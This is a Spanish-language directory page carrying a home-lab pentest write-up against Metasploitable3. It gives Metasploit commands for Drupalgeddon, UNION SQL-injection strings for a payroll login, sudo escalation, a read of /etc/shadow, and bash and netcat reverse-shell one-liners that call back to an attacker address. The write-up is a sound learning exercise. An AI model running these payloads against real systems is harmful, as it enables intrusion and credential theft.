Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/adfortunato/metasploitable3-pentest-writeup
Escalada de PrivilegiosReconocimientoAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónCTFPruebas de Penetración

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Aprendizaje y Educación
Labs y Práctica
GitHubadfortunato/metasploitable3-pentest-writeup

metasploitable3-pentest-writeup

Informe de prueba de penetración de laboratorio doméstico de Metasploitable3 que cubre reconocimiento con Nmap, RCE de Drupalgeddon, inyección SQL, reutilización de credenciales SSH, escalada de privilegios con sudo y shells inversas.

Ver Repositorio
24hace 21 díasAún no revisado

Metasploitable3 — Informe de Prueba de Penetración

Autor: Arlen Fortunato
Fecha: Septiembre 2026
Entorno: Parrot OS (atacante) → Metasploitable3 Ubuntu 14.04 (objetivo)
Alcance: Prueba de penetración de red completa — enumeración, explotación, escalada de privilegios, post-explotación
Tipo: Home Lab / Práctica de Capture The Flag

⚠️ Todas las credenciales a continuación están censuradas. Este fue un ejercicio legal y aislado en un laboratorio doméstico.


Herramientas Utilizadas

HerramientaRol
NmapEscaneo de puertos, detección de servicio/versión, fingerprint de SO
Metasploit (msfconsole)Explotación (CVE-2014-3704), gestión de sesiones
msfvenomGeneración de payloads (reverse shells bash/netcat)
nc (netcat)Listener de reverse shell
curl / sedCreación manual de SQLi + formateo de salida HTML
ssh / scpAcceso remoto, validación de credenciales
openssl s_clientVerificación de servicio TLS/SSL
gobusterFuerza bruta de directorios (enumeración web)

Reconocimiento — Escaneo Completo de Puertos con Nmap

nmap -O -sV -p- -oA metasploitable3 <TARGET_IP>
PuertoEstadoServicioVersión
21/tcpabiertoFTPProFTPD 1.3.5
22/tcpabiertoSSHOpenSSH 6.6.1p1
80/tcpabiertoHTTPApache httpd 2.4.7 (Ubuntu)
445/tcpabiertoSMBSamba smbd 3.X–4.X
631/tcpabiertoIPPCUPS 1.7
3306/tcpabiertoMySQLMySQL (no autorizado)
3500/tcpabiertoHTTPWEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcpabiertoIRCUnrealIRCd
8080/tcpabiertoHTTPJetty 8.1.7.v20120910

SO: Linux Ubuntu 14.04, Kernel 3.13.0-24-generic x86_64


Resumen de Hallazgos

#VulnerabilidadCVE / TipoPuertoSeveridadResultado
1Fingerprint de versión de UnrealIRCd — sondeo de backdoorCVE-2010-20756697⚠️ Falso positivoVerificación automática del módulo superada, sondeo manual fallido — backdoor ausente en la compilación
2Drupal 7.5 — Drupageddon RCECVE-2014-370480🔴 CríticaShell Meterpreter como www-data
3Aplicación de nóminas — SQLi UNION (manual)Inyección manual80🔴 CríticaVolcado completo de BD (15 usuarios, contraseñas en texto plano — censuradas)
4SSH — credenciales por defecto + reutilizadasPor defecto / reutilización de credenciales22🔴 Críticavagrant (sudo NOPASSWD), luke_skywalker (sudo ALL)
5Escalada de privilegios (dos rutas)sudo mal configuradoN/A🔴 Críticaroot mediante ambas cuentas
6Volcado de shadowPost-explotaciónN/A🔴 Crítica16 hashes md5crypt extraídos
7Reverse shells (bash + netcat)msfvenom / creación manual4444/4445🟠 AltaShells interactivas capturadas en el listener del atacante

Detalles de los Hallazgos

1. UnrealIRCd 3.2.8.1 (CVE-2010-2075) — Falso Positivo

Vulnerabilidad: UnrealIRCd 3.2.8.1 se distribuía históricamente con un binario troyanizado que ejecuta comandos arbitrarios cuando un cliente no autenticado envía una cadena de activación antes del registro — RCE como el usuario del demonio IRC.

Intento de explotación: Módulo de Metasploit exploit/unix/irc/unreal_ircd_3281_backdoor con payloads cmd/unix/reverse_perl, cmd/unix/reverse_netcat, cmd/unix/reverse_bash. La verificación automática del módulo reportó el servicio como vulnerable; ninguna sesión devuelta con ningún payload.

Solución de problemas realizada:

  • Puerto accesible (nc -vz)
  • Puerto confirmado como IRC en texto plano, no TLS (openssl s_client)
  • Conexión inversa manual desde el objetivo confirmó que la red saliente funciona
  • Activación manual del backdoor mediante nc devolvió error de protocolo IRC 451 — el comando fue interpretado como comando IRC, nunca ejecutado

Conclusión: El banner de versión indica la compilación vulnerable, pero el backdoor está ausente en esta instancia (binario limpio/recompilado). Clasificado como no explotable — falso positivo, con evidencia.


2. Drupal 7.5 — Drupageddon (CVE-2014-3704)

Vulnerabilidad: Drupal 7.x anterior a 7.32 contiene una inyección SQL crítica en la capa de abstracción de base de datos que permite ejecución remota de código sin autenticación.

Confirmación de versión: CHANGELOG.txt → "Drupal 7.5, 2011-07-27"

Explotación:

msfconsole
use exploit/multi/http/drupal_drupageddon
set RHOSTS <TARGET_IP>
set TARGETURI /drupal/
set LHOST <ATTACKER_IP>
set payload php/meterpreter_reverse_tcp
run

Resultado:

getuid  → www-data
sysinfo → Linux ubuntu 3.13.0-24-generic x86_64
pwd     → /var/www/html/drupal

Enumeración post-explotación:

  • /var/www/html: chat/, drupal/, payroll_app.php, phpmyadmin/
  • /home: 16 cuentas de usuario

3. Aplicación de Nóminas — Inyección SQL Basada en UNION (Manual)

Vulnerabilidad: Formulario de inicio de sesión de payroll_app.php, inyección SQL en el campo de contraseña. Sin automatización — creada mediante curl.

Paso 1 — Omisión de autenticación:

' or 1=1#

' cierra la cadena SQL, or 1=1 fuerza verdadero, # comenta la comilla final.

Paso 2 — Conteo de columnas + mapeo de visualización:

' UNION SELECT null, null, null, null#     -- sin error = 4 columnas
' UNION SELECT 1, 2, 3, 4#                 -- marcadores: 1=Username, 2=First, 3=Last, 4=Salary

Paso 3 — Enumeración de information_schema:

PreguntaRespuesta
Versión de BD / usuarioMySQL 5.5.62, root@localhost
Bases de datosinformation_schema, drupal, mysql, payroll, performance_schema
Tablas en payrollusers
Columnas en usersusername, first_name, last_name, password, salary

Paso 4 — Volcado (contraseñas censuradas):

' UNION SELECT username, password, salary, null FROM users#
UsuarioContraseñaSalario
leia_organa[CENSURADO]9560
luke_skywalker[CENSURADO]1080
han_solo[CENSURADO]1200
artoo_detoo[CENSURADO]22222
boba_fett[CENSURADO]20000
greedo[CENSURADO]50000
(+ 9 cuentas más)[CENSURADO]—

4. SSH — Credenciales por Defecto y Reutilización de Credenciales

Ruta 1 — Cuenta por defecto: el par de credenciales por defecto vagrant autenticado mediante SSH → usuario en el grupo sudo con (ALL : ALL) NOPASSWD: ALL.

Ruta 2 — Reutilización de credenciales: credenciales obtenidas del volcado SQLi autenticadas directamente mediante SSH como otro usuario del laboratorio (luke_skywalker, grupo sudo, (ALL : ALL) ALL).

Importancia: demuestra la reutilización de credenciales entre servicios — credenciales de aplicación mapeadas a una cuenta de sistema.


5. Escalada de Privilegios (Dos Rutas)

  • Ruta A: vagrant → sudo -l muestra NOPASSWD: ALL → sudo su - → uid=0(root).
  • Ruta B: luke_skywalker → sudo (ALL : ALL) ALL → sudo su - → uid=0(root).

No se requirió exploit local — ambas cuentas poseen permisos sudo excesivamente permisivos.


6. Volcado de Shadow

sudo cat /etc/shadow

Se extrajeron 16 hashes md5crypt ($1$) — recolección completa de credenciales tras la escalada de privilegios.


7. Post-Explotación — Reverse Shells

Payload 1 — bash:

bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

Capturado en nc -lnvp 4444 → shell interactiva.

Payload 2 — netcat (named-pipe):

mkfifo /tmp/fifo; nc <ATTACKER_IP> 4445 0</tmp/fifo | /bin/sh >/tmp/fifo 2>&1; rm /tmp/fifo

Capturado en nc -lnvp 4445 → shell interactiva.

Mecanismo: el named pipe (FIFO) conecta stdin/stdout de netcat a /bin/sh, formando un túnel bidireccional de un solo socket; el FIFO se elimina después.


Recomendaciones de Remediación

Descargar herramienta